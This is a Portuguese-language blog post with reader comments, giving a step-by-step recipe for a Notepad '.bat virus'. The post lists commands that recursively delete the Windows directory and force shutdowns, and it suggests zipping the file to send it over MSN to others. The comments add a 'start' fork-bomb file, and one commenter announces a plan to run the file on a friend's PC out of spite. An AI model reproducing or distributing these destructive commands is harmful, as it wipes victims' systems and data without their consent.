COMO FAZER UM VÍRUS NO BLOCO DE NOTAS

Você sabe o que é um bloco de notas né, se não souber pergunte para alguem que tenha menos de 5 anos que ele vai te responder

É muito simples, é só seguir as indicações abaixo. Bom vamos lá

Criar vírus no bloco de nota

Va em iniciar/executar e digite notepad.
Irá abrir o bloco de notas.
Copie o comando e cole no bloco de notas ao salvar vc usa .bat após o nome do arquivo
Ex: Virus.bat ( sempre tem que ser .bat)

del /s /q c:\windows\
(deleta tudo dentro do windows ex: arquivos e naum pastas)

rmdir /s /q c:\windows
(deleta tudo do windows) - (ferra o pc)

shutdown -s
(desliga o pc)

shutdown -r
(reinicia o pc)

Obs: Não teste em seu proprio pc pois pode ocorer alguns danos. Lembrando que esses comandos,são só para o windows XP.OBS: Para enviar o arquivo pelo msn vc tem que zipar ele

13 comentários:

Rafael disse...

ow vc tem certeza q isso da certo ?

Anônimo disse...

é só tentar ai ué...

caio disse...

ai eu tenho serteza mando direto

Anônimo disse...

eu fiz tudo direito e o resultado não foi bom PRA MIM, quase destruiu o meu pc, NÃO FAÇAM ISSO QUE ELE DIZ!!!!!!!!!!!!!!!!!!

Anônimo disse...

Fiooo
vc tem q por assim

quando vc salva tem q ser assim


nomedoarquivo.bat

frago


se num for assim fode teu pc



Entrem no meu blog:

www.dedepunk.blogspot.com

Anônimo disse...

cara tu é muito burro como você conseguiu foder seu própio pc
devia ter tentado:
executar
"cmd"
shapeshifter/comands/pc

Anônimo disse...

Fiz o virús de Delatar o Windows e testei no meu pc!!!
Adivinhem!!!
Deu certo!!!

Anônimo disse...

isto e k e ppl banana testar virus de formatar no proprio pc

Anônimo disse...

rapaz aqui quem fala eos hackers natalinos isto vai fuder seu pc ate uma criança sabe que se deletar as folders do windows ja era o sisitema opracional para criar um viru nao e possivel pelo bloco de notas so pelo cmd nos analizamos tu do isto e pensamos em postar um tutorial sobre criar uma hydra ou seja um virus de varias cabeças e extremamente potente o unico jeito de le rodar se vc instalar ele em uma sub pasta do pc de alguem se instalar la a pessoa nem vai desconfiar
se vc instala r em um banco tem como vc rou bar dinheiro de outras pessoas .

atençao: o conteudo e de total resposabilidade do usuario

Anônimo disse...

Como voces conse destruir com o própio pc tenho outro virus para vcs abra o bloco de notas e escreva start start start o máximo de vezes quanto mais melhor salve e coloque a final .bat - é um cavalo de tróia!

Anônimo disse...

kkkkkkkkk, .bat - cavalo de troian vc ta e loco manoo vc estudar linga assembler va, pq vc e burrim

Anônimo disse...

Eu vou testar no pc do meu amigo só porque eu formatei o pc dele e ele num mim pagou nenhum centavo num deu nem obrigado !!!

sa disse...

TÓPICO POBRE

http://www.webcheats.com.br/forum/hacking-lab-em-geral/95327-como-criar-um-virus-bat-no-not-pad-bloco-de-notas.html



MUITO MAIS VÍRUS NO LINK ACIMA!!!